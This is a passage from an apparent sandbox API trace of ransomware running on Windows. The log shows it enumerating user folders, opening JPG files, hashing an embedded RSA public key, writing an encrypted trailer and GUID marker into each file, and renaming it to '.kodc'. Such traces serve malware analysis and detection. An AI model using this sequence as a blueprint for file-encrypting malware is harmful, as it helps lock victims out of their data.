hHeap=0x630000) returned 1 [0099.207] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.207] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.209] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0 [0099.209] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0099.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0099.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0099.209] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.209] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\") returned="My Documents\\" [0099.209] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.209] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.209] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.209] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.210] PathFindFileNameW (pszPath="") returned="" [0099.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0xffffffff [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.210] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.210] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\") returned="NetHood\\" [0099.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.210] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.210] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.210] PathFindFileNameW (pszPath="") returned="" [0099.210] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed4acb60, ftCreationTime.dwHighDateTime=0x1d5b77b, ftLastAccessTime.dwLowDateTime=0xa46e4990, ftLastAccessTime.dwHighDateTime=0x1d5be50, ftLastWriteTime.dwLowDateTime=0xa46e4990, ftLastWriteTime.dwHighDateTime=0x1d5be50, nFileSizeHigh=0x0, nFileSizeLow=0x17259, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zJaZRQuuMWfUQbpV5cxu.m4a", cAlternateFileName="ZJAZRQ~1.M4A")) returned 0xffffffff [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0099.210] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0099.210] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.210] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.210] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0099.211] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.211] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.211] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.211] PathFindFileNameW (pszPath="") returned="" [0099.211] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0099.211] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.211] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.211] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdaacc150, ftCreationTime.dwHighDateTime=0x1d5c420, ftLastAccessTime.dwLowDateTime=0xb6be4ba0, ftLastAccessTime.dwHighDateTime=0x1d5c1ba, ftLastWriteTime.dwLowDateTime=0xb6be4ba0, ftLastWriteTime.dwHighDateTime=0x1d5c1ba, nFileSizeHigh=0x0, nFileSizeLow=0x137ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-DReH91mc.jpg", cAlternateFileName="-DREH9~1.JPG")) returned 1 [0099.211] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-DReH91mc.jpg") returned=".jpg" [0099.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-DReH91mc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-dreh91mc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.211] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=79871) returned 1 [0099.211] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.214] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x137d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.214] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.215] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.215] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.215] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.215] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x137ff, lpOverlapped=0x0) returned 1 [0099.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.216] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.216] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.217] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.217] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.217] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.217] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.217] GetLastError () returned 0x0 [0099.217] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.217] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.217] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.217] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.217] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.217] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.217] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x13800) returned 0x9ba6d90 [0099.218] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dc78 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ad90 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9dcc0 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331ada8 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331adf0 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.218] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.218] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.218] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331adf0 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331add8 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331adf0 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331add8 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.219] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.219] GetCurrentThreadId () returned 0x42c [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba4e38 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.219] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.220] GetCurrentThreadId () returned 0x42c [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331add8 [0099.220] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.220] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.221] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x137ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.221] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.221] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.221] CloseHandle (hObject=0x5cc) returned 1 [0099.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.222] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.223] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-DReH91mc.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-dreh91mc.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\-DReH91mc.jpg.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\-dreh91mc.jpg.kodc")) returned 1 [0099.225] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb57469e0, ftCreationTime.dwHighDateTime=0x1d5b81f, ftLastAccessTime.dwLowDateTime=0xfd8d61f0, ftLastAccessTime.dwHighDateTime=0x1d5c1cf, ftLastWriteTime.dwLowDateTime=0xfd8d61f0, ftLastWriteTime.dwHighDateTime=0x1d5c1cf, nFileSizeHigh=0x0, nFileSizeLow=0xdb48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0yU28tc546iJ81.jpg", cAlternateFileName="0YU28T~1.JPG")) returned 1 [0099.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.225] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.225] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0yU28tc546iJ81.jpg") returned=".jpg" [0099.225] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0yU28tc546iJ81.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0yu28tc546ij81.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.225] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=56136) returned 1 [0099.225] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.228] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xdb22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.228] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.229] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.229] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xdb48, lpOverlapped=0x0) returned 1 [0099.229] lstrlenA 